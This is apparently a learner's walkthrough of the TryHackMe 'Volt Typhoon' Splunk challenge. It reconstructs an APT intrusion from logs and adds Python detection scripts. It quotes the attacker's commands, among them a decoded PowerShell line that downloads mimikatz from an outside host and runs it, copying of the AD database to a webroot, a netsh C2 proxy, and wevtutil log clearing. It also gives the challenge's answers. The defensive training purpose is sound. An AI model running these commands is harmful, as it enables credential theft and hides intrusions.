Volt Typhoon

TryHackMe Challenge Walkthrough

Challenge Overview

The SOC has detected suspicious activity indicative of an advanced persistent threat (APT) group known as Volt Typhoon, notorious for targeting high-value organizations. Assume the role of a security analyst and investigate the intrusion by retracing the attacker’s steps.

You have been provided with various log types from a two-week time frame during which the suspected attack occurred. Your ability to research the suspected APT and understand how they maneuver through targeted networks will prove to be just as important as your Splunk skills.

Threat Analysis Summary

Analyst Summary Report

Incident Title

Volt Typhoon APT Intrusion via ADSelfService Exploit

Category

Credential Access, Lateral Movement, Defense Evasion, C2

Detection Source

ADSelfService Logs, PowerShell Logs, WMIC Events, Registry Queries

Investigation Workflow

  • Credential Hijack Detection
    • Reviewed ADSelfService Plus logs and identified a password change on the dean-admin account.
    • Found successful password change from external IP, followed by failed attempts — a clear sign of takeover.
  • Account Creation & Privilege Escalation
    • Detected creation of voltyp-admin via PowerShell and WMIC logs.
    • Confirmed the new account had administrative privileges.
  • Living-off-the-Land Execution
    • Investigated use of WMIC for:
      • AD DB dumping (ntdsutil)
      • File transfers and compression using xcopy, 7z
      • Proxy configuration via netsh
    • Tracked file movements to web server directories.
  • Web Shell Deployment & Persistence
    • Identified use of certutil to deploy iisstart.aspx web shell.
    • Observed lateral movement and redeployment under AuditReport.jspx.
  • Credential Access
    • Detected download and execution of Mimikatz via encoded PowerShell.
    • Registry queries for _OpenSSH, putty, and realvnc confirmed targeting of stored credentials.
  • Data Collection & Exfiltration
    • Confirmed sensitive financial files (2022.csv, 2023.csv, 2024.csv) were copied for staging.
    • Detected renaming of exfil archive to .gif for obfuscation.
  • Defense Evasion & Cleanup
    • Detected PowerShell commands wiping MRU and clearing logs via wevtutil.
    • Verified use of Remove-ItemProperty and log deletion across 4 log categories.

Recommendations

  • Patch exposed apps
    • The attack started through a vulnerable service. Keep external apps updated.
  • Harden admin accounts
    • Use strong credentials and enable MFA on privileged accounts.
  • Log command-line activity
    • Enable and monitor PowerShell, WMIC, and netsh logging.
  • Monitor file uploads
    • Watch for unusual uploads or renamed files in temp/web folders.
  • Alert on suspicious registry access
    • Detect access to tools storing creds like Putty or RealVNC.
  • Protect your logs
    • Restrict log deletion and back up regularly to catch cleanup attempts.

Tools Used

  • Splunk – Log analysis and event correlation
  • CyberChef – Decoding Base64 payloads
  • MITRE ATT&CK Navigator – Mapping observed techniques

Key Evidences

  • ADSelfService logs showing the password change of dean-admin
  • PowerShell logs indicating use of Mimikatz via encoded command
  • WMIC execution across nodes (xcopy, 7z, ntdsutil, etc.)
  • Proxy setup using netsh to 10.2.30.1:8443
  • Registry access to credential-related tools (Putty, OpenSSH, RealVNC)
  • Event log clearing using wevtutil cl
  • Web shell staging in C:\Windows\Temp\ and lateral movement via AuditReport.jspx

Chain Attack Overview

Initial Access

Exploited ADSelfService Plus vulnerability to compromise dean-admin

Execution

Used WMIC to run PowerShell and native binaries (xcopy, 7z, ntdsutil)

Persistence

Deployed web shells (iisstart.aspx, AuditReport.jspx)

Privilege Escalation

Created new admin account voltyp-admin

Defense Evasion

Used Remove-ItemProperty, renamed archives, and cleared logs with wevtutil

Discovery

Queried registry and event logs for virtualization and logon patterns

Credential Access

Executed Mimikatz; accessed registry for credential tools

Exfiltration

Compressed and renamed data; staged in web server directory

Command & Control

Set up proxy with netsh to 10.2.30.1:8443

Impact

Credentials dumped, sensitive files copied, logs deleted, persistence established

MITRE ATT&CK Mapping

| Phase | ID | Technique | Description |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | ADSelfService Plus exploited |
| Execution | T1047 | Windows Management Instrumentation (WMIC) | Used WMIC for command execution and remote process creation |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell used to execute and obfuscate commands |
| Persistence | T1505.003 | Server Software Component: Web Shell | Planted encoded web shell in C:\Windows\Temp |
| Persistence | T1136 | Create Account | Created voltyp-admin admin account |
| Defense Evasion | T1070.001 | Clear Windows Event Logs | Used wevtutil cl to clear logs (Application, Security, etc.) |
| Defense Evasion | T1027 | Obfuscated Files or Information | Encoded payloads and obfuscated archive rename |
| Credential Access | T1003.003 | OS Credential Dumping: NTDS | Used ntdsutil to dump AD database |
| Credential Access | T1552.004 | Unsecured Credentials: Private Keys and Configs | Queried registry for VNC, PuTTY, OpenSSH |
| Discovery | T1082 | System Information Discovery | Queried drive and network interface info via WMIC |
| Discovery | T1012 | Query Registry | Used PowerShell to check virtualization keys in registry |
| Discovery | T1033 | System Owner/User Discovery | Used whoami and other identity recon |
| Collection | T1560.001 | Archive Collected Data | Used 7z to compress database with password protection |
| Exfiltration | T1048.003 | Exfiltration Over Alternative Protocol: Custom Protocol | Exfiltrated data via proxy connection using renamed .gif file |
| C2 | T1090.001 | Proxy: Internal Proxy | Used netsh to create local port proxy to remote address |

Reference: MITRE ATT&CK Navigator (https://attack.mitre.org/)

Q & A

INITIAL ACCESS

Volt Typhoon often gains initial access to target networks by exploiting vulnerabilities in enterprise software. In recent incidents, Volt Typhoon has been observed leveraging vulnerabilities in Zoho ManageEngine ADSelfService Plus, a popular self-service password management solution used by organizations.

Q1 Comb through the ADSelfService Plus logs to begin retracing the attacker’s steps. At what time (ISO 8601 format) was Dean's password changed and their account taken over by the attacker?

So we start, as suggested, by filtering for sourcetype adss and then for the username Dean.

We don't have many fields in general to play with, but we can make our table clearer with the few available.
For this question the interesting fields are action_name and status.

So let's check for password changes.

Splunk Query:

index=* sourcetype=adss username="dean-admin" action_name="Password Change"

Two results: a completed password change followed by a failed one. I guess our attacker unlocked the account and changed the password, and later on Dean-Admin was no longer able to modify it.

To be sure, we can check nearby events, especially from the same IP address that changed the password, and look for failed attempts beforehand, a classic account takeover pattern.

Answer

2024-03-24T11:10:22
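The takeover pattern described above (a completed password change, then failed changes on the same account), as an added example that is not part of the original walkthrough. The records are constructed to mirror the adss fields used here (time, username, action_name, status) plus a src_ip field, and the rule that the later failures come from a different address than the successful change is my assumption, not something the challenge states.

```python
from datetime import datetime, timedelta

# Constructed sample events in the shape of the adss sourcetype; the dean-admin
# timestamps mirror the walkthrough, the IP addresses are made up (TEST-NET).
EVENTS = [
    {"time": "2024-03-24T10:58:41", "username": "dean-admin", "src_ip": "203.0.113.7",
     "action_name": "Unlock Account", "status": "success"},
    {"time": "2024-03-24T11:10:22", "username": "dean-admin", "src_ip": "203.0.113.7",
     "action_name": "Password Change", "status": "success"},
    {"time": "2024-03-24T11:41:05", "username": "dean-admin", "src_ip": "192.168.1.40",
     "action_name": "Password Change", "status": "failed"},
    {"time": "2024-03-24T13:05:00", "username": "dean-admin", "src_ip": "192.168.1.40",
     "action_name": "Password Change", "status": "failed"},
    # Legitimate user who mistyped the old password right after changing it: the
    # failure comes from the same address as the change, so it is not flagged.
    {"time": "2024-03-24T09:00:00", "username": "bob", "src_ip": "192.168.1.77",
     "action_name": "Password Change", "status": "success"},
    {"time": "2024-03-24T09:02:00", "username": "bob", "src_ip": "192.168.1.77",
     "action_name": "Password Change", "status": "failed"},
]


def find_takeovers(events, window=timedelta(hours=6)):
    """Return one (username, change_time, change_ip, failing_ips) tuple for every
    successful Password Change that is followed within `window` by a failed
    Password Change on the same account from a different source address."""
    by_user = {}
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO 8601 sorts lexically
        by_user.setdefault(ev["username"], []).append(ev)
    hits = []
    for user, evs in by_user.items():
        for i, ev in enumerate(evs):
            if ev["action_name"] != "Password Change" or ev["status"] != "success":
                continue
            t0 = datetime.fromisoformat(ev["time"])
            failing = {
                f["src_ip"] for f in evs[i + 1:]
                if f["action_name"] == "Password Change" and f["status"] == "failed"
                and f["src_ip"] != ev["src_ip"]
                and datetime.fromisoformat(f["time"]) - t0 <= window
            }
            if failing:
                hits.append((user, ev["time"], ev["src_ip"], sorted(failing)))
    return hits


if __name__ == "__main__":
    for user, when, ip, failing in find_takeovers(EVENTS):
        print(f"{when} possible takeover of {user}: changed from {ip}, later failures from {failing}")
```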

Q2 Shortly after Dean's account was compromised, the attacker created a new administrator account. What is the name of the new account that was created?

Let's look at the events after the password change (set the time range to +5h).
Remove Dean from the query and select all the sourcetypes (we need to see wmic and powershell this time); we can easily see that a new admin account has been created.

An interesting new field is command.

Splunk Query:

index=* sourcetype=*

Answer

voltyp-admin

EXECUTION

Volt Typhoon is known to exploit Windows Management Instrumentation Command-line (WMIC) for a range of execution techniques. They leverage WMIC for tasks such as gathering information and dumping valuable databases, allowing them to infiltrate and exploit target networks. By using “living off the land” binaries (LOLBins), they blend in with legitimate system activity, making detection more challenging.

Q3 In an information gathering attempt, what command does the attacker run to find information about local drives on server01 & server02?

I would include in the query any command containing server (and of course get) that happened after the initial access, from the user dean-admin.

And this is where it starts — the first wmic event sets the tone for what’s coming. From here, we can piece together the attacker’s activity step-by-step:

Copying the AD database dump

  • The attacker moves the dumped temp.dit file into a web-accessible directory:
    wmic /node:webserver-01 process call create “cmd.exe /c xcopy C:\Windows\Temp\tmp\temp.dit \\webserver-01\c$\inetpub\wwwroot”

Compressing the file with a password

  • Using 7-Zip, they archive the file with a password and split it into 100MB volumes:
    wmic /node:webserver-01 process call create “cmd.exe /c 7z a -v100m -p d5ag0nm@5t3r -t7z cisco-up.7z C:\inetpub\wwwroot\temp.dit”

Renaming the archive to bypass detection

  • The .7z file is disguised as a .gif to appear less suspicious:
    wmic /node:webserver-01 process call create “cmd.exe /c ren \\webserver-01\c$\inetpub\wwwroot\cisco-up.7z cl64.gif”

Cleaning up evidence

  • The attacker wipes the C:\Windows\Temp directory:
    wmic /node:webserver-01 process call create “cmd.exe rd /S C:\Windows\Temp”

Gathering system network configuration

  • Basic NIC details and DHCP-related settings are retrieved:
    wmic get MACAddress, IPAddress, DHCPEnabled, DHCPLeaseExpires, DHCPLeaseObtained, DHCPServer & nic get AdapterType, AutoSense, Name

Ensuring file sharing is enabled

  • The Server service (`LanmanServer`) is started to allow SMB access:
    wmic service where “Name='LanmanServer'” call startservice

Setting up a port forwarding rule (C2 staging)

  • A proxy tunnel is established to redirect traffic to the attacker’s listener:
    wmic /node:server-01 /user:dean-admin /password:uNcr4cK4b1e process call create “cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=8443 connectaddress=10.2.30.1”

Removing the port forwarding rule (cleanup)

  • Once no longer needed, the tunnel is removed:
    wmic /node:server-01 /user:dean-admin /password:uNcr4cK4b1e process call create “cmd.exe /c netsh interface portproxy delete v4tov4 listenport=50100 listenaddress=0.0.0.0”

Answer

wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename
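A small triage pass over the command lines reconstructed above, as an added example (my code, not the challenge's or the original walkthrough's). It pulls out the indicators the later questions ask for: the ntdsutil dump, staging into wwwroot, the 7z archive password, the .7z to .gif rename, the netsh portproxy target, the wevtutil event-ID searches and log clearing, and the reg query credential hunting. The sample lines are constructed from the commands quoted in this walkthrough; the ntdsutil, wevtutil qe and reg query lines are my guesses at their exact form, since the page only names the tools.

```python
import re

# (tag, pattern): named groups in the pattern become the finding's detail.
RULES = [(tag, re.compile(p, re.I)) for tag, p in [
    ("ntds_dump", r"\bntdsutil\b"),
    ("stage_to_webroot", r"\b(?:xcopy|copy|copy-item)\b.*?(?P<dest>\S*wwwroot\S*)"),
    ("archive_password", r"\b7z\s+a\b.*?-p\s*(?P<password>\S+).*?\s(?P<archive>\S+\.7z)"),
    ("extension_masquerade", r"\bren\s+(?P<src>\S+\.(?P<sext>\w+))\s+(?P<dst>\S+\.(?P<dext>\w+))"),
    ("portproxy_add", r"portproxy\s+add\s+v4tov4.*?connectport=(?P<port>\d+).*?connectaddress=(?P<addr>[\d.]+)"),
    ("log_query", r"\bwevtutil(?:\.exe)?\s+qe\b.*?EventID\s*=\s*(?P<event_id>\d+)"),
    ("log_clear", r"\bwevtutil(?:\.exe)?\s+cl\s+(?P<logs>[\w\s]+)"),
    ("cred_store_query", r"\breg\s+query\b.*?(?P<tool>putty|openssh|realvnc)"),
]]

# Constructed sample command lines, built from the commands quoted in the
# walkthrough; the ntdsutil, wevtutil qe and reg query lines are my guesses at
# their exact form, since the page only names the tools.
SAMPLE = [
    r'ntdsutil "ac i ntds" ifm "create full C:\Windows\Temp\tmp" q q',
    r'wmic /node:webserver-01 process call create "cmd.exe /c xcopy C:\Windows\Temp\tmp\temp.dit \\webserver-01\c$\inetpub\wwwroot"',
    r'wmic /node:webserver-01 process call create "cmd.exe /c 7z a -v100m -p d5ag0nm@5t3r -t7z cisco-up.7z C:\inetpub\wwwroot\temp.dit"',
    r'wmic /node:webserver-01 process call create "cmd.exe /c ren \\webserver-01\c$\inetpub\wwwroot\cisco-up.7z cl64.gif"',
    r'wmic /node:server-01 process call create "cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=8443 connectaddress=10.2.30.1"',
    r'wmic /node:server-01 process call create "cmd.exe /c netsh interface portproxy delete v4tov4 listenport=50100 listenaddress=0.0.0.0"',
    r'wevtutil qe Security /q:"*[System[(EventID=4624)]]" /f:text /c:5',
    r'wevtutil cl Application Security Setup System',
    r'reg query HKCU\Software\SimonTatham\PuTTY\Sessions',
    r'ren C:\Users\dean\report_draft.txt report_final.txt',  # benign rename, same extension
]


def triage(lines):
    """Return a list of (tag, detail) findings; one line can trigger several rules."""
    findings = []
    for raw in lines:
        line = raw.replace("\u201c", '"').replace("\u201d", '"')  # smart quotes from logs/blogs
        for tag, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            detail = {k: v.strip('"') for k, v in m.groupdict().items()}
            if tag == "extension_masquerade" and detail["sext"].lower() == detail["dext"].lower():
                continue  # ordinary rename, extension unchanged
            if tag == "log_clear":
                detail = {"logs": detail["logs"].split()}
            findings.append((tag, detail))
    return findings


if __name__ == "__main__":
    for tag, detail in triage(SAMPLE):
        print(tag, detail)
```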

Q4 The attacker uses ntdsutil to create a copy of the AD database. After moving the file to a web server, the attacker compresses the database. What password does the attacker set on the archive?

Well, this is an easy one; we already noticed this event in the screenshot before:

2024-03-25T23:47:07 | dean-admin | server-02-main | 192.168.1.153 | wmic /node:webserver-01 process call create “cmd.exe /c 7z a -v100m -p d5ag0nm@5t3r -t7z cisco-up.7z C:\inetpub\wwwroot\temp.dit” | executed | success |

and yes, -p is the password :D

Answer

d5ag0nm@5t3r

PERSISTENCE

Our target APT frequently employs web shells as a persistence mechanism to maintain a foothold. They disguise these web shells as legitimate files, enabling remote control over the server and allowing them to execute commands undetected.

Q5 To establish persistence on the compromised server, the attacker created a web shell using base64 encoded text. In which directory was the web shell placed?

We noticed before that the attacker was messing in the Windows temp dir and we could go directly there, but let's pretend we didn't.

Check on MITRE ATT&CK what Volt Typhoon does, and look in the MITRE Navigator at what it says about persistence via web shells.

So let's look for those two files (AuditReport.jspx and iisstart.aspx) and see what shows up:

Splunk Query:

index=* sourcetype=*  iisstart.aspx

and we can see that the attacker is messing in the Windows\Temp folder.

If we query for ntuser.ini we can easily find our Base64 code to feed to our beloved CyberChef.

Answer

C:\Windows\Temp\

Q6 In an attempt to begin covering their tracks, the attackers remove evidence of the compromise. They first start by wiping RDP records. What PowerShell cmdlet does the attacker use to remove the “Most Recently Used” record?

So we query sourcetype=powershell and check the command line for remove.

Let's start with this query

Splunk Query:

index=* sourcetype=powershell
| table CommandLine
| dedup CommandLine

and we found our command, so now let's filter for Remove-ItemProperty; we can see it was used 3 times to remove records.

Answer

Remove-ItemProperty

Q7 The APT continues to cover their tracks by renaming and changing the extension of the previously created archive. What is the file name (with extension) created by the attackers?

The archive is the cisco-up.7z we noticed before, and we already saw the action of renaming it with ren:

wmic /node:webserver-01 process call create “cmd.exe /c ren \\webserver-01\c$\inetpub\wwwroot\cisco-up.7z cl64.gif”

Answer

cl64.gif

Q8 Under what regedit path does the attacker check for evidence of a virtualized environment?

The registry on any Windows system contains the following five root keys:
1. HKEY_CURRENT_USER
2. HKEY_USERS
3. HKEY_LOCAL_MACHINE
4. HKEY_CLASSES_ROOT
5. HKEY_CURRENT_CONFIG

Let's check for those with the Get-ItemProperty command.

And with HKEY_LOCAL_MACHINE we find our answer

(note: we already saw this one the first time we set up a table of the command lines: Get-ItemProperty -Path “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control”)

Answer

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

CREDENTIAL ACCESS

Volt Typhoon often combs through target networks to uncover and extract credentials from a range of programs. Additionally, they are known to access hashed credentials directly from system memory.

Q9 Using reg query, Volt Typhoon hunts for opportunities to find useful credentials. What three pieces of software do they investigate? (Answer Format: Alphabetical order separated by a comma and space.)

This is an easy one; we already have the command to look for (reg query).

Answer

OpenSSH, putty, realvnc

Q10 What is the full decoded command the attacker uses to download and run mimikatz?

If we search for mimikatz nothing shows up, so I guess it's encoded somehow.

Looking at the command line table I created before, there is an -exec command.

If I filter for this command I can find my encoded command.

Splunk Query:

index=* sourcetype="powershell" CommandLine="-exec"

Now we just give it to CyberChef to decode it from Base64.

Answer

Invoke-WebRequest -Uri “http://voltyp.com/3/tlz/mimikatz.exe” -OutFile “C:\Temp\db2\mimikatz.exe”; Start-Process -FilePath “C:\Temp\db2\mimikatz.exe” -ArgumentList @(“sekurlsa::minidump lsass.dmp”, “exit”) -NoNewWindow -Wait

DISCOVERY & LATERAL MOVEMENT

Discovery

Volt Typhoon uses enumeration techniques to gather additional information about network architecture, logging mechanisms, successful logins, and software configurations, enhancing their understanding of the target environment for strategic purposes.

Lateral Movement

The APT has been observed moving previously created web shells to different servers as part of their lateral movement strategy. This technique facilitates their ability to traverse through networks and maintain access across multiple systems.

Q11 The attacker uses wevtutil, a log retrieval tool, to enumerate Windows logs. What event IDs does the attacker search for?

Well, just search for wevtutil and out of 12 results we can easily find the 3 event IDs the attacker is looking for:

4624 – successful logon
4625 – failed logon
4769 – generated every time the Key Distribution Center (KDC) receives a Kerberos Ticket Granting Service (TGS) ticket request

Answer

4624 4625 4769

Q12 Moving laterally to server-02, the attacker copies over the original web shell. What is the name of the new web shell that was created?

We saw before, while looking for iisstart, that the first command was certutil and the second one was copy-item.

Answer

AuditReport.jspx

COLLECTION

During the collection phase, Volt Typhoon extracts various types of data, such as local web browser information and valuable assets discovered within the target environment.

Q13 The attacker is able to locate some valuable financial information during the collection phase. What three files does Volt Typhoon make copies of using PowerShell?

In the command line table we have copy-item, so just filter for this command.

Answer

2022.csv 2023.csv 2024.csv

C2 & CLEANUP

C2

Volt Typhoon utilizes publicly available tools as well as compromised devices to establish discreet command and control (C2) channels.

Cleanup

To cover their tracks, the APT has been observed deleting event logs and selectively removing other traces and artifacts of their malicious activities.

Q14 The attacker uses netsh to create a proxy for C2 communications. What connect address and port does the attacker use when setting up the proxy? Answer Format: IP Port

We can look for netsh and we immediately find our answer.

Answer

10[.]2[.]30[.]1 8443

Q15 To conceal their activities, what are the four types of event logs the attacker clears on the compromised system?

So looking at the MITRE Navigator, another of their defense evasion techniques is clearing event logs.

Wevtutil.exe is often used to execute this technique, and we already saw it was used by the attacker to search for event IDs, so let's look for wevtutil.

Splunk Query:

index=* sourcetype="powershell"  CommandLine=Wevtutil

and here we have our command line: wevtutil cl Application Security Setup System

Answer

Application Security Setup System

Conclusion

Volt Typhoon really went for the full playbook: webshells in Temp, password changes, file renaming, encoded PowerShell, event log wiping — the works. If subtlety were an Olympic sport, they’d at least medal.

They didn’t even bother hiding behind fancy malware. Just LOLBins, reg queries, and a bit of base64 — like it’s 2016 and no one’s watching.

The whole operation was a reminder that attackers don’t need zero-days when default logging is ignored and Windows Temp is treated like a black hole. Good job, Volt. Now please get out.

$ Whoami

Cybersecurity learner, log nerd, and TryHackMe badge hoarder. Let’s connect on LinkedIn before I get pulled into another packet capture.